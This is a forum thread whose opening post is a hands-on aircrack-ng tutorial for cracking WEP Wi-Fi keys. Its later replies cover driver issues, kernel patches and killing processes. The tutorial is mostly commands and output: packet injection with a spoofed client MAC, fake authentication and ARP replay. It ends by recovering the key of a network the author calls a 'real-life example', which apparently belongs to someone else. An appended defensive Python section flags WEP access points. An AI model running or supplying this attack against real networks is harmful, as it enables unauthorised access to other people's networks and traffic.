
Attacking WEP wireless networks

m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Attacking WEP wireless networks

Post by m0skit0 »

This tutorial is aimed at learning purposes only. You should use it on a network only if you have the administrator's permission. Use it on your own responsibility!

This tutorial will suppose the following:
  • Running on a system with BASH interpreter (e.g. Linux)
  • Wireless card that supports monitor mode and packet injection (e.g. Atheros chipset) working properly and with adequate drivers (this only matters on Windows)
  • Aircrack suite (airmon, airodump, aireplay, aircrack) installed and operational
Attacking a WEP-encrypted wireless network is fairly easy. This is due to a statistical vulnerability in the WEP encryption scheme. Without entering into much detail, if someone can capture a large number of useful packets containing a different IV (initialization vector), the key cracking process can be significantly reduced. You can check more info here.

The first thing we have to do is to set our wireless card into monitor mode. This way we can capture 802.11 packets from other networks, and also inject our own custom packets.

$ sudo airmon-ng stop wlan0

Interface	Chipset		Driver

wlan0		Unknown 	rt2800pci - [phy0]
				(monitor mode disabled)
$ sudo airmon-ng start wlan0

Interface	Chipset		Driver

wlan0		Unknown 	rt2800pci - [phy0]
				(monitor mode enabled on mon0)
We make sure the monitor device has been created:

$ ifconfig mon0

mon0      Link encap:UNSPEC  HWaddr EC-55-F9-B5-96-50-00-00-00-00-00-00-00-00-00-00  
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1937 errors:0 dropped:1937 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:262666 (262.6 KB)  TX bytes:0 (0.0 B)
Now we do a first scan on what is on the air ;)

$ sudo airodump-ng mon0

CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22                                         
                                                                                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                        
                                                                                                                                                                       
 64:68:0C:8D:9C:23  -33       10        1    0  11  54e  WPA  CCMP   PSK  JAZZTEL_9C22                                                                                 
 00:1A:2B:08:06:63  -70       11        0    0   3  54   WEP  WEP         WLAN_C2                                                                                      
 00:1A:2B:5B:D8:34  -70        8        0    0  11  54   WEP  WEP         JAZZTEL_0C                                                                                   
 00:24:17:18:40:FB  -78        9        0    0  11  54   WPA  TKIP   PSK  ORANGE-FB32FA                                                                                
 E8:39:DF:CF:D1:7E  -85        2        0    0   3  54e  WPA2 CCMP   PSK  Jazztel_A3                                                                                   
 40:4A:03:9E:E4:D0  -83        6        0    0   4  54 . WEP  WEP         WLAN_25                                                                                      
 00:21:63:6B:DA:58  -84        7        0    0  11  54e  WPA  TKIP   PSK  VodafoneDA57                                                                                 
 40:4A:03:BE:D6:A7  -84        7       58    0   9  54 . WEP  WEP         WLAN_A1                                                                                      
 00:1A:2B:13:98:1C  -83        9        0    0   3  54   WEP  WEP         WLAN_D7                                                                                      
 E8:39:DF:CF:D1:7D  -84        5        0    0   3  54e  WPA2 CCMP   PSK  Jazztel                                                                                       
 00:1D:6A:6C:F4:C3  -85        5        0    0   6  54e. WPA2 CCMP   PSK  Orange-80f4                                                                                  
 62:C7:14:33:18:5C  -86        6        0    0   7  54e  WPA  CCMP   PSK  vodafoneenrique01                                                                             
 88:25:2C:71:90:98  -86        8        0    0   6  54e. WEP  WEP         nuria                                                                                         
 00:13:49:89:27:7C  -87        8        0    0   9  54 . WEP  WEP         WLAN_91                                                                                       
 00:1A:2B:4A:6E:0E  -88        8        0    0  11  54   WEP  WEP         adsuar                                                                                       
 00:22:2D:3E:8D:48  -89        8        0    0  11  54e. WEP  WEP         lucy_david                                                                                   
 E0:91:53:49:70:DA  -90        9        1    0  10  54 . WEP  WEP         WLAN_78                                                                                       
 00:23:08:E3:C5:34  -90        3        4    0   9  54e. WEP  WEP         WLAN3C5903                                                                                    
 5C:33:8E:E0:63:3A  -90        5        0    0   6  54e. WPA2 CCMP   PSK  Reaviles_Madrid                                                                              
 50:67:F0:88:20:9C  -92        5        0    0   7  54 . WEP  WEP         WLAN_0B                                                                                      
 00:1A:2B:08:E4:BB  -93        0        0    0  11  54   WEP  WEP         galapagos                                                                                     
                                                                                                                                                                        
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                              
                                                                                                                                                                        
 (not associated)   40:28:49:55:A8:C2    0    0 - 1      0       11                                                                                                     
 64:68:0C:8D:9C:23  7C:61:93:E5:6B:5B  -40    0 - 5e     0        1                                                                                                     
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54    238       61  WLAN_A1    
With airodump we're completely undetected. We're only listening to what's on the air. Since we are only interested in WEP networks, we'll filter by encryption:

$ sudo airodump-ng --encrypt wep mon0

CH 10 ][ BAT: 2 hours 2 mins ][ Elapsed: 24 s ][ 2011-09-04 01:23                                          
                                                                                                                                                                       
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                        
                                                                                                                                                                       
 00:1A:2B:5B:D8:34  -70       18        0    0  11  54   WEP  WEP         JAZZTEL_0C                                                                                   
 00:1A:2B:08:06:63  -70       19        0    0   3  54   WEP  WEP         WLAN_C2                                                                                      
 00:1A:2B:13:98:1C  -82       19        0    0   3  54   WEP  WEP         WLAN_D7                                                                                      
 40:4A:03:9E:E4:D0  -84       17        0    0   4  54 . WEP  WEP         WLAN_25                                                                                      
 40:4A:03:BE:D6:A7  -84       16      182    0   9  54 . WEP  WEP         WLAN_A1                                                                                      
 00:13:49:89:27:7C  -87       13        0    0   9  54 . WEP  WEP         WLAN_91                                                                                      
 88:25:2C:71:90:98  -87       15        0    0   6  54e. WEP  WEP         nuria                                                                                        
 00:22:2D:3E:8D:48  -87       10        0    0  11  54e. WEP  WEP         lucy_david                                                                                    
 00:1A:2B:4A:6E:0E  -88       11        0    0  11  54   WEP  WEP         adsuar                                                                                        
 00:23:08:E3:C5:34  -89        4        0    0   9  54e. WEP  WEP         WLAN3C5903                                                                                    
 E0:91:53:49:70:DA  -90        7        0    0  10  54 . WEP  WEP         WLAN_78                                                                                       
 64:68:0C:6C:9C:11  -92        2        0    0   6  54   WEP  WEP         Wireless Jazztel                                                                              
 50:67:F0:88:20:9C  -92        4        0    0   7  54 . WEP  WEP         WLAN_0B                                                                                       
 00:1A:2B:08:E4:BB  -93        6        0    0  11  54   WEP  WEP         galapagos                                                                                     
 00:60:4C:98:61:89  -95        2        0    0   6  54 . WEP  WEP         adsl4917                                                                                      
                                                                                                                                                                        
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                              
                                                                                                                                                                        
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -72    0 -54    240      181     
We're searching for networks with high #Data output. WLAN_A1 network seems an excellent candidate. We'll filter by that network now:

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 mon0

 CH  9 ][ BAT: 2 hours 3 mins ][ Elapsed: 8 s ][ 2011-09-04 01:27                                          
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  -88   6       74      475   44   9  54 . WEP  WEP         WLAN_A1                                                                                  
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54     99      473                                                                                                     
Yeah this one seems ideal to attack. It even has an associated client (with MAC E0:B9:A5:66:F7:9E), which is great because he generates data (and not only beacons). We're going to log those IVs to use them later to crack the WEP key:

$ sudo airodump-ng --encrypt wep --channel 9 --bssid 40:4A:03:BE:D6:A7 --ivs -w WLAN_A1 mon0

 CH  9 ][ BAT: 1 hour 57 mins ][ Elapsed: 8 s ][ 2011-09-04 01:30                                          
                                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                    
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  -88   7       91      519   47   9  54 . WEP  WEP         WLAN_A1                                                                                  
                                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                             
                                                                                                                                                                       
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54     74      519
As we see, the connected client is already generating a lot of data. But what if he stops doing so, or disconnects? To prevent this, we're going to fake this client. First of all, we're going to fake the client's authentication, so it seems to the AP that he never disconnected. Notice how we use the client's MAC with the -h switch. All auth packets are being sent with his MAC, so we're still hidden.

$ sudo aireplay-ng --fakeauth 10 -a 40:4A:03:BE:D6:A7 -h E0:B9:A5:66:F7:9E mon0

The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:33:27  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9

01:33:27  Sending Authentication Request (Open System)
01:33:27  Authentication successful
01:33:27  Sending Association Request
01:33:27  Association successful :-) (AID: 1)
 [ACK]
This will repeat the authentication every 10 seconds. Now even if he disconnects, the AP will still think he's connected. Now it's time to gather some of his data to generate more replies from the AP. This is useful in case he disconnects, to reuse later when he's disconnected, or simply to generate more data. Notice again the use of the -h switch with the client's MAC address.

$ sudo aireplay-ng --arpreplay -h E0:B9:A5:66:F7:9E -b 40:4A:03:BE:D6:A7 mon0

The interface MAC (EC:55:F9:B5:96:50) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether E0:B9:A5:66:F7:9E
01:36:45  Waiting for beacon frame (BSSID: 40:4A:03:BE:D6:A7) on channel 9
Saving ARP requests in replay_arp-0904-013645.cap
You should also start airodump-ng to capture replies.
Read 5291 packets (got 1485 ARP requests and 229 ACKs), sent 2742 packets...(500 pps)
We got ARP requests and we're sending them back to the AP to generate even more data packets. This should speed up IV gathering, as we see:

CH  9 ][ BAT: 1 hour 9 mins ][ Elapsed: 8 mins ][ 2011-09-04 01:38                                          
                                                                                                                                                                      
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                   
                                                                                                                                                                      
 40:4A:03:BE:D6:A7  -84  45     4072    34576  361   9  54 . WEP  WEP    OPN  WLAN_A1                                                                                 
                                                                                                                                                                      
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                                                            
                                                                                                                                                                      
 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E    0   24 - 1   8121    81946  WLAN_A1
This should be enough to crack the WEP key. Let's launch aircrack proper ;) See the use of the -c switch to limit cracking to alphanumeric characters, which are the most likely ones used.

$ aircrack-ng -c WLAN_A1-01.ivs

Opening WLAN_A1-01.ivs
Read 51527 packets.

   #  BSSID              ESSID                     Encryption

   1  40:4A:03:BE:D6:A7  WLAN_A1                   WEP (51526 IVs)

Choosing first network as target.

Opening WLAN_A1-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 51738 ivs.


                                                                            Aircrack-ng 1.1 r1904


                                                            [00:00:00] Tested 37 keys (got 30056 IVs)

   KB    depth   byte(vote)
    0    0/  2   5A(42752) 7D(36608) 9E(36608) E6(36608) ED(36352) 64(36096) 7F(36096) 0B(35840) 3F(35584) 89(35584) 66(35072) 6D(35072) 2F(34816) 
    1    7/  8   6B(36352) 62(35584) 03(35328) 29(35328) 70(35072) 7A(34816) A2(34816) A7(34816) 0D(34560) 32(34560) 8C(34560) 1E(34304) CA(34304) 
    2    3/  2   8D(36096) 33(35840) 90(35840) 1C(35072) 2D(35072) BB(35072) FF(35072) 0C(34816) 53(34816) D0(34816) 9C(34560) AB(34560) 23(34304) 
    3    4/  3   C0(36864) A2(35840) AF(35840) 30(35584) 36(35584) 31(35328) 79(35072) 2A(34816) 2D(34560) 55(34560) 14(34304) 4F(34304) FA(34304) 
    4    0/  2   33(45568) 69(39680) E3(36096) 0E(35328) 13(35328) 23(35328) 80(35328) B4(35328) E4(35328) 92(35072) 9C(35072) 0F(34816) 87(34816) 

     KEY FOUND! [ 5A:34:30:34:41:30:33:43:35:30:45:41:31 ] (ASCII: Z404A03C50EA1 )
	Decrypted correctly: 100%
And done! :) This is the easiest case you can find, but as you can see WEP encryption is pretty useless. This network's key was cracked in around 15 minutes.

Hope this was useful for you, see you! ;)
I wanna lots of mov al,0xb
"just not into this RA stuffz"
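As an added example (not code from the post above), here is how a defender would use the same airodump-ng output: the script parses the text table layout shown in the tutorial, lists every access point still running WEP, and applies the birthday bound to its #Data count to show how quickly the 24-bit IV space starts repeating. The sample tables are constructed excerpts built from values quoted in the thread; the function names are my own.

```python
"""Added example: list access points still using WEP in an airodump-ng scan
and apply the birthday bound to their #Data count (not the post's own code)."""
import math
import re
from collections import namedtuple

IV_SPACE = 2 ** 24  # WEP prepends a 24-bit IV to every data frame
MAC_RE = re.compile(r"^[0-9A-F]{2}(:[0-9A-F]{2}){5}$", re.I)
AUTH_VALUES = {"PSK", "OPN", "SKA", "MGT"}  # what airodump prints under AUTH
AccessPoint = namedtuple("AccessPoint", "bssid channel data enc cipher auth essid")

# Constructed excerpt in the unfiltered airodump-ng layout (values from the thread).
SAMPLE_SCAN = """\
 CH 11 ][ BAT: 1 hour 59 mins ][ Elapsed: 12 s ][ 2011-09-04 01:22

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 64:68:0C:8D:9C:23  -33       10        1    0  11  54e  WPA  CCMP   PSK  JAZZTEL_9C22
 00:1A:2B:08:06:63  -70       11        0    0   3  54   WEP  WEP         WLAN_C2
 64:68:0C:6C:9C:11  -92        2        0    0   6  54   WEP  WEP         Wireless Jazztel

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 40:4A:03:BE:D6:A7  E0:B9:A5:66:F7:9E  -70    0 -54    238       61  WLAN_A1
"""

# Constructed excerpt in the --bssid filtered layout, which adds an RXQ column.
SAMPLE_FILTERED = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 40:4A:03:BE:D6:A7  -84  45     4072    34576  361   9  54 . WEP  WEP    OPN  WLAN_A1
"""


def parse_airodump(text):
    """Return the AP rows of an airodump-ng text dump as AccessPoint tuples."""
    aps, has_rxq = [], False
    for line in text.splitlines():
        tok = line.split()
        if not tok:
            continue
        if tok[0] == "BSSID":            # header: remember whether RXQ is present
            has_rxq = "RXQ" in tok
            continue
        if not MAC_RE.match(tok[0]):     # status line or "(not associated)"
            continue
        if len(tok) > 1 and MAC_RE.match(tok[1]):
            continue                     # station row (BSSID STATION ...)
        i = 3 if has_rxq else 2          # skip PWR (and RXQ)
        _beacons, data, _per_s, ch = tok[i:i + 4]
        i += 5                           # skip the MB column ("54", "54e", "54e.")
        if tok[i] == ".":                # QoS marker printed as a detached "."
            i += 1
        enc, cipher, i = tok[i], tok[i + 1], i + 2
        auth = ""
        if i < len(tok) and tok[i] in AUTH_VALUES:
            auth, i = tok[i], i + 1      # AUTH is blank for most WEP rows
        aps.append(AccessPoint(tok[0], int(ch), int(data), enc, cipher, auth,
                               " ".join(tok[i:])))  # ESSID may contain spaces
    return aps


def iv_collision_probability(frames):
    """Birthday bound: chance that `frames` uniformly chosen 24-bit IVs repeat."""
    if frames < 2:
        return 0.0
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


def audit_wep(text):
    """(bssid, essid, data frames, IV-reuse probability) for every WEP AP seen."""
    return [(ap.bssid, ap.essid, ap.data, round(iv_collision_probability(ap.data), 3))
            for ap in parse_airodump(text) if ap.enc == "WEP"]


if __name__ == "__main__":
    for finding in audit_wep(SAMPLE_SCAN) + audit_wep(SAMPLE_FILTERED):
        print("WEP still in use: bssid=%s essid=%r data=%d p_iv_reuse=%.3f" % finding)
```

Feed it a saved airodump-ng screen (or the text of one of the tables above) and any AP whose ENC column reads WEP is reported; around five thousand data frames are already enough for a coin-flip chance of an IV repeat, which is why rotating a WEP key never helps.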
ASKidwai
Posts: 937
Joined: Mon Jan 10, 2011 7:42 am
Location: 'Ere and There

Re: Attacking WEP wireless networks

Post by ASKidwai »

Nice guide and thanks but

sudo airmon-ng start wlan-0


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID	Name
739	avahi-daemon
740	NetworkManager
743	avahi-daemon
819	wpa_supplicant
1300	dhclient
Process with PID 1300 (dhclient) is running on interface wlan0


Interface	Chipset		Driver

wlan0		Unknown 		rtl819xSE
I get this after sudo airmon-ng start wlan-0
on Ubuntu 10.04

Not sure if this helps but

03:00.0 Ethernet controller [0200]: Atheros Communications Atheros AR8132 / L1c Gigabit Ethernet Adapter [1969:1062] (rev c0)
	Subsystem: LG Electronics, Inc. Device [1854:200d]
	Flags: bus master, fast devsel, latency 0, IRQ 30
	Memory at febc0000 (64-bit, non-prefetchable) [size=256K]
	I/O ports at dc00 [size=128]
	Capabilities: [40] Power Management version 3
	Capabilities: [48] Message Signalled Interrupts: Mask- 64bit+ Queue=0/0
Halvhjearne
Posts: 664
Joined: Mon Mar 14, 2011 1:58 am
Location: Denmark

Re: Attacking WEP wireless networks

Post by Halvhjearne »

Nice guide, although it is beginning to be useless, as no one in their right mind would still use WEP ...

Still, it's good info and a nice guide. I was messing with these commands a little while ago but kinda gave up on it .. I might try again after reading this .. thanks m0skit0 :mrgreen:
Dr. Evil wrote:I used to use Windows, but it was designed by freakin' idiots.
Now i use linux allowing me to conrol the "lasers" on my "death star" with ease.
I'm Dr. Evil, and I'm aspiring to take over the world.
skilgannon
Posts: 34
Joined: Tue Nov 16, 2010 6:06 am

Re: Attacking WEP wireless networks

Post by skilgannon »

I have been doing this for a bit under a year now, but I have to use BackTrack because I get "the AP is on channel (whatever channel) but channel is locked to -1". I have tried many different fixes and googled for the last year for a solution, but nothing seems to work, while it works perfectly on BackTrack. It does this stupid -1 channel thing on Ubuntu 11.04. I'm sick of having to use 3 different OSes for different things. Does anybody know a fix for this (hopefully one I haven't tried yet)?
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

ASKidwai wrote:Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
Those are processes that are using network resources. You should only kill them if they're interfering with aircrack. If the aircrack suite works properly, there's no need to touch them. Just FYI, to kill a process you have to use the kill tool, like

kill -TERM process_id
or in case it doesn't finish

kill -KILL process_id
This will kill it for sure. Do not use -KILL at first or you might lose the data the process is handling.
Halvhjearne wrote:it is beginning to be useless, as no one in there right mind would still use WEP ...
There are plenty of people out of their minds. In fact this tuto is a real-life example.
skilgannon wrote:channel is locked to -1
IIRC you have to patch aircrack for that. Anyway, I use BackTrack too.
codestation
Big Beholder
Posts: 1660
Joined: Wed Jan 19, 2011 3:45 pm
Location: /dev/negi

Re: Attacking WEP wireless networks

Post by codestation »

m0skit0 wrote:
skilgannon wrote:channel is locked to -1
IIRC you have to patch aircrack for that. Anyway, I use BackTrack too.
It's a kernel patch (if you have one for aircrack itself let me know; I tend to forget to patch my kernel when updating).

http://patches.aircrack-ng.org/channel- ... axim.patch

Dunno why this isn't in mainline yet :?

P.S.: are you going to add what to do if the AP doesn't have any clients? I like your approach, since the tutorials at the aircrack website don't cover these little things that you add to make the attack session easier.
Plugin list
Working on: QPSNProxy, QCMA - Open source content manager for the PS Vita
Playing: Error: ENOTIME
Repositories: github, google code
Just feel the code..
ASKidwai
Posts: 937
Joined: Mon Jan 10, 2011 7:42 am
Location: 'Ere and There

Re: Attacking WEP wireless networks

Post by ASKidwai »

OK.

I'll try when I get back to Linux. I still use WEP because no-one actually knows what WPA is :P
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

codestation wrote:Its a kernel patch
Yup, sorry :oops:
codestation wrote:are you going to add what to do if the AP doesn't have any clients?
If I remember correctly, I cracked one using the ChopChop attack. I'll try to refresh my memory and post what I've remembered ;)
skilgannon
Posts: 34
Joined: Tue Nov 16, 2010 6:06 am

Re: Attacking WEP wireless networks

Post by skilgannon »

I've patched the kernel before and bricked my laptop; I had to use my recovery disks, so I'm a bit scared to try again, but it was different from the one you posted. I have heard people download a second version of the kernel and then patch it so you don't mess up your original, but then I don't know how to apply it.
m0skit0
Guru
Posts: 3817
Joined: Mon Sep 27, 2010 6:01 pm

Re: Attacking WEP wireless networks

Post by m0skit0 »

skilgannon wrote:bricked my laptop
Laptops do not brick, they're open systems. You don't have to fear anything, a laptop does not "break" for such things.